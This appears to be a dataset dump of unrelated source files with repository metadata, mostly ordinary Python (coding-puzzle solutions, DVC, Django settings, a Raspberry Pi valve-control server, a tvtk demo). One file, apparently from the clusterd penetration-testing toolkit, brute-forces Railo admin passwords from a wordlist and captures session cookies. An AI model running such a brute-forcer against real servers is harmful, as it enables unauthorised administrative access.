| 2021-04-26T06:04:33.034864
| 2018-01-03T13:26:19
| 2018-01-03T13:26:19
| 59,116,302
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
from objects import *
my_object = ClassName
print(my_object.__doc__)
print(my_object.class_variable)
my_object.class_method(my_object)
my_object.print_class_variable(my_object)
|
[
"brage89@gmail.com"
] |
brage89@gmail.com
|
7b1f66dd10d8d19462a808b9915411777c07b644
|
e1292fb9f2b359f71fbc54a4eb6ae4cf0c1ff51d
|
/machines/rasppi32/socket_server.py
|
18c67fe41ecbe2ebc0ace9dc89691c92450be8f2
|
[] |
no_license
|
JNRiedel/PyExpLabSys
|
879d5c6bf552e89134629f0c6ca011af67937c3d
|
b69daaa9c932b9264d9f731cc3f2091f31f5d36e
|
refs/heads/master
| 2020-04-08T08:45:17.466865
| 2014-08-22T11:06:24
| 2014-08-22T11:06:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,797
|
py
|
""" Socket server for valve-control box """
import time
import SocketServer
import wiringpi2 as wp
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
received_data = self.request[0].strip()
data = "test"
socket = self.request[1]
if received_data == "read":
print "read_all"
data = ''
for i in range(0, 20):
data += str(wp.digitalRead(i))
for i in range(0, 9):
if (received_data[0:11] == "set_state_" + str(i + 1)):
val = received_data[11:].strip()
if val == '0':
wp.digitalWrite(i, 0)
data = "ok"
if val == '1':
wp.digitalWrite(i, 1)
data = "ok"
for i in range(9, 20):
if (received_data[0:12] == "set_state_" + str(i + 1)):
val = received_data[12:].strip()
if val == '0':
wp.digitalWrite(i, 0)
data = "ok"
if val == '1':
wp.digitalWrite(i, 1)
data = "ok"
socket.sendto(data, self.client_address)
if __name__ == "__main__":
wp.wiringPiSetup()
time.sleep(1)
for index in range(0, 21): # Set GPIO pins to output
wp.pinMode(index, 1)
wp.digitalWrite(index, 0)
# Now that all output are low, we can open main safety output
wp.digitalWrite(20, 1)
for index in range(0, 21): # Set GPIO pins to output
wp.digitalWrite(index, 1)
HOST, PORT = "10.54.7.32", 9999 # Rasppi33
server = SocketServer.UDPServer((HOST, PORT), MyUDPHandler)
server.serve_forever()
|
[
"jensen.robert@gmail.com"
] |
jensen.robert@gmail.com
|
18764b8e0e245a262c3d95f37922342280da279e
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/agc015/B/4420123.py
|
e240646ff0645ed09389907878e7f5bc4ba5d2a1
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
s = input()
n = len(s)
ans = 0
for i, c in enumerate(s):
ans += n-1
if c == "U":
ans += i
else:
ans += n-1 - i
print(ans)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
3acd29f1a10016eb1f86cb5cf195ad30bb94dd36
|
e79de9c9def60b0f814ab0625a2eb8bce3428ddd
|
/challenges/own/operas/operas_solution.py
|
0f21f23d8e6186991dd3ca538f90015a1629a287
|
[] |
no_license
|
mh70cz/py_old
|
a80e2140a279541c3639f89df70fadad34f7df0f
|
1af878cfbff24e5c6d39219c2c4faebd5a12f0c4
|
refs/heads/master
| 2022-04-05T15:07:10.840387
| 2020-01-13T18:39:50
| 2020-01-13T18:39:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,202
|
py
|
"""
For two given composers find operas (one of composers is the author)
at which premiere both could have been together (i.e. they both had to be alive).
Just a theoretical possibility of presence is considered
"""
from datetime import datetime
composers = {
"beethoven": ("Ludwig van Beethoven", "17 December 1770", "26 March 1827"),
"wagner": ("Richard Wagner", "22 May 1813", "13 February 1883"),
"verdi": ("Giuseppe Verdi", "9 October 1813", "27 January 1901"),
"mozart": ("Wolfgang Amadeus Mozart", "27 January 1756", "5 December 1791"),
}
operas = [
("mozart", "Apollo and Hyacinth", "13 May 1767"),
("mozart", "Marriage of Figaro", "1 May 1786"),
("mozart", "Don Giovanni", "29 October 1787"),
("mozart", "Così fan tutte", "6 January 1790"),
("mozart", "The Clemency of Titus", "6 September 1791"),
("mozart", "The Magic Flute", "30 September 1791"),
("wagner", "The Fairies", "29 June 1888"),
("wagner", "Rienzi", "20 October 1842"),
("wagner", "The Flying Dutchman", "2 January 1843"),
("wagner", "Tannhäuser", "19 October 1845"),
("wagner", "Lohengrin", "28 August 1850"),
("wagner", "The Rhinegold", "22 September 1869"),
("wagner", "The Valkyrie", "26 June 1870"),
("wagner", "Siegfried", "16 August 1876"),
("wagner", "Twilight of the Gods", "17 August 1876"),
("wagner", "Tristan and Isolde", "10 June 1865"),
("wagner", "The Master-Singers of Nuremberg", "21 June 1868"),
("wagner", "Parsifal", "26 July 1882"),
("beethoven", "Fidelio", "20 November 1805"),
("verdi", "Nabucco", "9 March 1842"),
("verdi", "Ernani", "9 March 1844"),
("verdi", "Macbeth", "14 March 1847"),
("verdi", "Il corsaro", "25 October 1848"),
("verdi", "Rigoletto", "11 March 1851"),
("verdi", "La traviata", "6 March 1853"),
("verdi", "Aroldo", "16 August 1857"),
("verdi", "Macbeth", "21 April 1865"),
("verdi", "Don Carlos", "11 March 1867"),
("verdi", "Aida", "24 December 1871"),
("verdi", "Otello", "5 February 1887"),
("verdi", "Falstaff", "9 February 1893"),
]
def _get_date(date_str):
return datetime.date(datetime.strptime(date_str, "%d %B %Y"))
def operas_both_at_premiere(guest, composer, operas=operas):
""" Returns a list of operas,
where the guest and the composer could have been together at premiere.
Args:
guest (str): one of the composers but not the author of an opera
composer (str): the author of an opera
operas (list): list of operas
Returns a list of titles of operas.
"""
if guest not in composers.keys():
raise ValueError("guest is not in composers")
if composer not in composers.keys():
raise ValueError("composer is not in composers")
at_premiere = []
guest_born = _get_date(composers[guest][1])
guest_died = _get_date(composers[guest][2])
composer_died = _get_date(composers[composer][2])
for opera in operas:
if opera[0] == composer:
premiere = _get_date(opera[2])
if (guest_born < premiere < guest_died) and (premiere < composer_died):
at_premiere.append(opera[1])
return at_premiere
|
[
"mh70@mh70.cz"
] |
mh70@mh70.cz
|
a643359cdc06e3dad758fb3aebf4acc8e8ccfee6
|
5e48c355308cfe3fe84835f3d56218a53f7968cd
|
/dvc/parsing/__init__.py
|
b173de4384e38b7898d811d2d2e19cb55d2b293d
|
[
"Apache-2.0"
] |
permissive
|
imhardikj/dvc
|
97b6637f75d90e9f3f708211aec07e3da2fa205f
|
911534116e4f870f87b05caf2bed38e105a205ad
|
refs/heads/master
| 2023-01-05T04:01:46.308634
| 2020-10-29T09:01:34
| 2020-10-29T09:01:34
| 264,737,803
| 0
| 0
|
Apache-2.0
| 2020-05-17T19:08:07
| 2020-05-17T19:08:06
| null |
UTF-8
|
Python
| false
| false
| 3,764
|
py
|
import logging
import os
from collections import defaultdict
from copy import deepcopy
from itertools import starmap
from typing import TYPE_CHECKING
from funcy import first, join
from dvc.dependency.param import ParamsDependency
from dvc.path_info import PathInfo
from dvc.utils.serialize import dumps_yaml
from .context import Context
from .interpolate import resolve
if TYPE_CHECKING:
from dvc.repo import Repo
logger = logging.getLogger(__name__)
STAGES_KWD = "stages"
USE_KWD = "use"
VARS_KWD = "vars"
WDIR_KWD = "wdir"
DEFAULT_PARAMS_FILE = ParamsDependency.DEFAULT_PARAMS_FILE
PARAMS_KWD = "params"
class DataResolver:
def __init__(self, repo: "Repo", wdir: PathInfo, d: dict):
to_import: PathInfo = wdir / d.get(USE_KWD, DEFAULT_PARAMS_FILE)
vars_ = d.get(VARS_KWD, {})
vars_ctx = Context(vars_)
if os.path.exists(to_import):
self.global_ctx_source = to_import
self.global_ctx = Context.load_from(repo.tree, str(to_import))
else:
self.global_ctx = Context()
self.global_ctx_source = None
logger.debug(
"%s does not exist, it won't be used in parametrization",
to_import,
)
self.global_ctx.merge_update(vars_ctx)
self.data: dict = d
self.wdir = wdir
self.repo = repo
def _resolve_entry(self, name: str, definition):
context = Context.clone(self.global_ctx)
return self._resolve_stage(context, name, definition)
def resolve(self):
stages = self.data.get(STAGES_KWD, {})
data = join(starmap(self._resolve_entry, stages.items()))
logger.trace("Resolved dvc.yaml:\n%s", dumps_yaml(data))
return {STAGES_KWD: data}
def _resolve_stage(self, context: Context, name: str, definition) -> dict:
definition = deepcopy(definition)
wdir = self._resolve_wdir(context, definition.get(WDIR_KWD))
if self.wdir != wdir:
logger.debug(
"Stage %s has different wdir than dvc.yaml file", name
)
contexts = []
params_yaml_file = wdir / DEFAULT_PARAMS_FILE
if self.global_ctx_source != params_yaml_file:
if os.path.exists(params_yaml_file):
contexts.append(
Context.load_from(self.repo.tree, str(params_yaml_file))
)
else:
logger.debug(
"%s does not exist for stage %s", params_yaml_file, name
)
params_file = definition.get(PARAMS_KWD, [])
for item in params_file:
if item and isinstance(item, dict):
contexts.append(
Context.load_from(self.repo.tree, str(wdir / first(item)))
)
context.merge_update(*contexts)
logger.trace( # pytype: disable=attribute-error
"Context during resolution of stage %s:\n%s", name, context
)
with context.track():
stage_d = resolve(definition, context)
params = stage_d.get(PARAMS_KWD, []) + self._resolve_params(
context, wdir
)
if params:
stage_d[PARAMS_KWD] = params
return {name: stage_d}
def _resolve_params(self, context: Context, wdir):
tracked = defaultdict(set)
for src, keys in context.tracked.items():
tracked[str(PathInfo(src).relative_to(wdir))].update(keys)
return [{file: list(keys)} for file, keys in tracked.items()]
def _resolve_wdir(self, context: Context, wdir: str = None) -> PathInfo:
if not wdir:
return self.wdir
wdir = resolve(wdir, context)
return self.wdir / str(wdir)
|
[
"noreply@github.com"
] |
imhardikj.noreply@github.com
|
ac3f36b00c738fcffba08b38b22ace5d60c3a19f
|
2656f92d8329bc1b28188802badc7b3a945fa978
|
/src/platform/railo/authenticate.py
|
8ee7b6a90b019f5aa138fc25923c9a2625b4583e
|
[
"MIT"
] |
permissive
|
koutto/clusterd
|
81828698574bc7301cd4eb0ad87d3115ddf74612
|
93db0a50210dcc6147c3122a539104a36e92f02b
|
refs/heads/master
| 2020-05-03T17:51:55.430955
| 2019-03-31T23:20:22
| 2019-03-31T23:20:22
| 178,751,876
| 2
| 1
|
MIT
| 2019-03-31T23:04:14
| 2019-03-31T23:04:13
| null |
UTF-8
|
Python
| false
| false
| 2,588
|
py
|
from src.platform.railo.interfaces import RINTERFACES
from requests.utils import dict_from_cookiejar
from collections import OrderedDict
from sys import stdout
from log import LOG
import state
import utility
def _auth(pswd, url, title):
""" Support auth for both the web and server interfaces
"""
data = OrderedDict([
("lang", "en"),
("rememberMe", "yyyy"),
("submit", "submit")
])
if title is RINTERFACES.WEB:
data["login_passwordweb"] = pswd
elif title is RINTERFACES.SRV:
data['login_passwordserver'] = pswd
response = utility.requests_post(url, data=data)
if response.status_code is 200 and "login.login_password" not in response.content:
utility.Msg("Successfully authenticated with '%s'" % pswd, LOG.DEBUG)
return dict_from_cookiejar(response.cookies)
def checkAuth(ip, port, title):
""" Railo doesn't have usernames, so we only care about passwords
"""
url = None
if title is RINTERFACES.WEB:
url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
elif title is RINTERFACES.SRV:
url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
else:
utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
return
if state.usr_auth:
# check with given auth; handle both cases of "default" and ":default"
if ':' in state.usr_auth:
(_, pswd) = state.usr_auth.split(":")
else:
pswd = state.usr_auth
return _auth(pswd, url, title)
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(word, url, title)
if cook:
print ''
utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
|
[
"shodivine@gmail.com"
] |
shodivine@gmail.com
|
668781a6f78564088417314c29bba0050a82a1a5
|
8d55d3a52ed6dc8111801cea9c7c9d0a84be736b
|
/src/1392.longest-happy-prefix.py
|
3b5ddbab31d9da69b9465e8818f5c3b68d1a952b
|
[] |
no_license
|
mic0ud/Leetcode-py3
|
2a23270034ec470571e57c498830b93af813645f
|
61fabda324338e907ce3514ae8931c013b8fe401
|
refs/heads/master
| 2022-12-26T11:52:31.666395
| 2020-09-27T19:27:10
| 2020-09-27T19:27:10
| 297,135,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
#
# @lc app=leetcode id=1392 lang=python3
#
# [1392] Longest Happy Prefix
#
# https://leetcode.com/problems/longest-happy-prefix/description/
#
# algorithms
# Hard (39.14%)
# Likes: 191
# Dislikes: 15
# Total Accepted: 8K
# Total Submissions: 20.1K
# Testcase Example: '"level"'
#
# A string is called a happy prefix if is a non-empty prefix which is also a
# suffix (excluding itself).
#
# Given a string s. Return the longest happy prefix of s .
#
# Return an empty string if no such prefix exists.
#
#
# Example 1:
#
#
# Input: s = "level"
# Output: "l"
# Explanation: s contains 4 prefix excluding itself ("l", "le", "lev", "leve"),
# and suffix ("l", "el", "vel", "evel"). The largest prefix which is also
# suffix is given by "l".
#
#
# Example 2:
#
#
# Input: s = "ababab"
# Output: "abab"
# Explanation: "abab" is the largest prefix which is also suffix. They can
# overlap in the original string.
#
#
# Example 3:
#
#
# Input: s = "leetcodeleet"
# Output: "leet"
#
#
# Example 4:
#
#
# Input: s = "a"
# Output: ""
#
#
#
# Constraints:
#
#
# 1 <= s.length <= 10^5
# s contains only lowercase English letters.
#
#
#
# @lc code=start
class Solution:
def longestPrefix(self, s: str) -> str:
sp = self.suffix_prefix(s)
return s[:sp[-1]]
def suffix_prefix(self, s) -> [int]:
res, i = [0], 0
for j in range(1, len(s)):
while i > 0 and s[i] != s[j]:
i = res[i-1]
if s[i] == s[j]:
res.append(i+1)
i += 1
else:
res.append(0)
return res
# @lc code=end
if __name__ == '__main__':
s = Solution()
s.longestPrefix("levele")
s.longestPrefix("leetcodeleet")
|
[
"ebizui@gmail.com"
] |
ebizui@gmail.com
|
0b0904c3cb0fa4f9689e280d90bb751078b85fb6
|
3474b315da3cc5cb3f7823f19a18b63a8da6a526
|
/scratch/KRAMS/src/apps/scratch/faezeh/lab/cell_lab/shell.py
|
93472192968f601cf1db0bcfe727b1175ea20d64
|
[] |
no_license
|
h4ck3rm1k3/scratch
|
8df97462f696bc2be00f1e58232e1cd915f0fafd
|
0a114a41b0d1e9b2d68dbe7af7cf34db11512539
|
refs/heads/master
| 2021-01-21T15:31:38.718039
| 2013-09-19T10:48:24
| 2013-09-19T10:48:24
| 29,173,525
| 0
| 0
| null | 2015-01-13T04:58:57
| 2015-01-13T04:58:56
| null |
UTF-8
|
Python
| false
| false
| 3,462
|
py
|
'''
(C)2004 ORFEUS
This is the default python module file. It has been generated
by the modtree administrator
Import the generated Python module in order to
- initialize the required modules and
- load the compiled module extension library of this module
'''
# Here you can add your own code ...
#!/usr/bin/env python
"""A simple example demonstrating how one can use numpy arrays
transparently with TVTK.
"""
# Author: Prabhu Ramachandran and Eric Jones
# Copyright (c) 2004-2007, Enthought, Inc.
# License: BSD Style.
from enthought.tvtk.api import tvtk
from numpy import array
temperature = tvtk.DoubleArray()
temperature.insert_next_value(0.)
temperature.insert_next_value(20.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
#temp_array.append(temp2)
### TVTK PIPELINE
# create a render window and hand it the renderer
render_window = tvtk.RenderWindow(size=(400,400))
# create a renderer
renderer = tvtk.Renderer(background=(0.839216, 0.839216, 0.839216))
render_window.add_renderer(renderer)
# create interactor and hand it the render window
# This handles mouse interaction with window.
interactor = tvtk.RenderWindowInteractor(render_window=render_window)
points_arr = tvtk.Points()
#points_arr.insert_point(0, -1, -1, 0)
#points_arr.insert_point(1, 1, -1, 0)
#points_arr.insert_point(2, 1, 1, 0)
#points_arr.insert_point(3, -1, 1, 0)
#points_arr.insert_point(0, 0., 0., 0.)
#points_arr.insert_point(1, 0.5, 0., 1.)
#points_arr.insert_point(2, 1., 0., 0.)
#points_arr.insert_point(3, 1., 0.5, 0.)
#points_arr.insert_point(4, 1, 1., 0.)
#points_arr.insert_point(5, 0.5, 1, 1.)
#points_arr.insert_point(6, 0, 1., 0.)
#points_arr.insert_point(7, 0., 0.5, 0.)
points_arr.insert_point(0, 0., 0., 0.)
points_arr.insert_point(1, 1., 0., 0.)
points_arr.insert_point(2, 1., 1., 0.)
points_arr.insert_point(3, 0., 1., 0.)
points_arr.insert_point(4, 0.5, 0., 0.)
points_arr.insert_point(5, 1, 0.5, 0.)
points_arr.insert_point(6, 0.5, 1., 0.)
points_arr.insert_point(7, 0., 0.5, 0.)
#points_arr.insert_point(4, 1.5, 0., 0.)
#points_arr.insert_point(5, 2, 0.5, 0.)
#points_arr.insert_point(6, 1.5, 1., 0.)
#points_arr.insert_point(7, 1., 0.5, 0.)
quad = tvtk.QuadraticQuad()
quad._get_point_ids().set_id(0, 0)
quad._get_point_ids().set_id(1, 1)
quad._get_point_ids().set_id(2, 2)
quad._get_point_ids().set_id(3, 3)
quad._get_point_ids().set_id(4, 4)
quad._get_point_ids().set_id(5, 5)
quad._get_point_ids().set_id(6, 6)
quad._get_point_ids().set_id(7, 7)
#define array
polys = tvtk.CellArray()
#connect a cell to the array
polys.insert_next_cell(quad)
# Create a mesh from the data created above.
#mesh = tvtk.PolyData(points = points_arr,polys = polys)
mesh = tvtk.UnstructuredGrid()
mesh.insert_next_cell(quad.cell_type,quad._get_point_ids() )
mesh.points = points_arr
mesh.point_data.scalars = temperature
# Set the mapper to scale temperature range
# across the entire range of colors
#mapper = tvtk.PolyDataMapper(input=mesh)
mapper = tvtk.DataSetMapper(input=mesh)
# Create mesh actor for display
actor = tvtk.Actor(mapper=mapper)
actor.property.color=(1, 0, 0)
actor.property.point_size=(200.)
actor.property.line_width=(200.)
# Now add the actors to the renderer and start the interaction.
renderer.add_actor(actor)
interactor.initialize()
interactor.start()
|
[
"Axel@Axel-Pc"
] |
Axel@Axel-Pc
|
70476e212daa4321863e86fabbc6752a86a59967
|
d5219de4d3e4bef5c8c71e209158dd92d4f8a011
|
/project/config/settings/common.py
|
a1d862bdb54494fd64d57ad3cdfcf6166a07ffa9
|
[
"MIT"
] |
permissive
|
ilmoeuro/asylum
|
1932de32ae6db6b34d1609775d5ff9037130fe02
|
88d48d59cba58738bf141142bae7d1182cf4d5e7
|
refs/heads/master
| 2021-01-24T23:13:09.090463
| 2015-11-27T21:56:21
| 2015-11-27T21:56:21
| 47,000,716
| 1
| 0
| null | 2015-11-27T21:53:40
| 2015-11-27T21:53:40
| null |
UTF-8
|
Python
| false
| false
| 8,123
|
py
|
# -*- coding: utf-8 -*-
"""
Django settings for asylum project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import os.path
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('asylum')
env = environ.Env()
# If the project root contains a .env file, read it
if os.path.isfile(str(ROOT_DIR + '.env')):
environ.Env.read_env(str(ROOT_DIR + '.env'))
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
)
# Apps specific for this project go here.
LOCAL_APPS = (
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'asylum.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Anders Innovations""", 'support@anders.fi'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="postgres:///asylum"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Helsinki'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'fi-FI'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
_TEMPLATE_CONTEXT_PROCESSORS = [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
]
TEMPLATES = [
{
'BACKEND': "django_jinja.backend.Jinja2",
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
'match_extension': '.jinja',
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
'newstyle_gettext': True
}
},
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
|
[
"eero.afheurlin@iki.fi"
] |
eero.afheurlin@iki.fi
|
b00094732bf4e992d6d1f015c038435845b72877
|
f15d9b6513a053258e1b96fe54d14ee84e92b33a
|
/wirefox/db/moz_places.py
|
561d64e34c1c1363ef89b2f1850d4faf8d44a68b
|
[] |
no_license
|
amol9/wirefox
|
867cbd00c9e250bd91509dfbc1baf751871d8f42
|
3f8561d0c6d01773d510bae337b9348132e3a5c8
|
refs/heads/master
| 2021-01-13T21:14:12.091991
| 2017-03-13T14:29:14
| 2017-03-13T14:29:14
| 81,830,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,096
|
py
|
from .time_window import TimeWindow
from .firefox_db import FirefoxDB
class MozPlaces:
def __init__(self):
self._firefox_db = None
def query(self, url=None, title=None, start_time=None, end_time=None, period=None):
if self._firefox_db is None:
self._firefox_db = FirefoxDB()
self._firefox_db.open_places_db()
session = self._firefox_db.session
moz_places = self._firefox_db.get_moz_places()
q = session.query(moz_places)
if url is not None:
q = q.filter(moz_places.url.like('%s'%url))
if title is not None:
q = q.filter(moz_places.title.like('%%%s%%'%title))
if start_time is not None or end_time is not None or period is not None:
tw = TimeWindow(start=start_time, end=end_time, period=period)
q = q.filter(moz_places.last_visit_date >= (tw.start_time.timestamp() * 1000000))
q = q.filter(moz_places.last_visit_date <= (tw.end_time.timestamp() * 1000000))
for r in q:
print(r.url, '|', r.visit_count)
|
[
"babaiscool@gmail.com"
] |
babaiscool@gmail.com
|
758eb49de79ccd0c369067efc4283f514df09080
|
f77b0f2cc709b9670e6b4dc7145a6ea5368585d2
|
/templates/compiled/macros/grids.py
|
6c7879946fd4f337eb9525497945a87c107b0aa0
|
[] |
no_license
|
sgammon/StonerHub
|
45ccac6bd349200bbc75c494002c3ffeb082dcb8
|
a81f7fdd2c7118c6cea3c25ef9f53f272d27b0cc
|
refs/heads/master
| 2021-01-20T10:54:47.546251
| 2011-11-07T12:02:20
| 2011-11-07T12:02:20
| 2,664,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
from __future__ import division
from jinja2.runtime import LoopContext, TemplateReference, Macro, Markup, TemplateRuntimeError, missing, concat, escape, markup_join, unicode_join, to_string, identity, TemplateNotFound
def run(environment):
name = 'source/macros/grids.html'
def root(context, environment=environment):
if 0: yield None
blocks = {}
debug_info = ''
return locals()
|
[
"sgammon@bluestatedigital.com"
] |
sgammon@bluestatedigital.com
|
e5735a8778ca5d33468e7d9caf2b4a808fae37fb
|
bbe0cb13a7d9ba461b2af6a69f18f8e7ef2301fe
|
/code_processing/Lc2D.1.0e-02_LcSlab.1.0e-02/calc_k_vs_t.py
|
772e49ece97cb6b3a37614a19f8f80df774f52ae
|
[] |
no_license
|
jimsrc/corpad
|
b52b841f0a1b8ddca98236d4a61a9d6079699aff
|
60756729b3cc1206352b95b2038f87b75ac749ef
|
refs/heads/master
| 2021-03-27T10:10:39.756497
| 2018-02-04T18:04:58
| 2018-02-04T18:04:58
| 99,851,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,055
|
py
|
##
from funcs import *
import os
def generate_k_vs_t(Ek, dir_data):
dir_info = '%s/info' % dir_data
fname_orient = '%s/orientations.in' % dir_info
fname_plas = '%s/plas.in' % dir_info
fname_turb = '%s/turb.in' % dir_info
NPLAS = count_lines_in_file(fname_orient)
# orden del nro max de giroperiodos
order_tmax = int(log10(value(fname_plas, 'nmax_gyroperiods')))
# nro de filas x archivo (nro de puntos q le pedi a la simulacion)
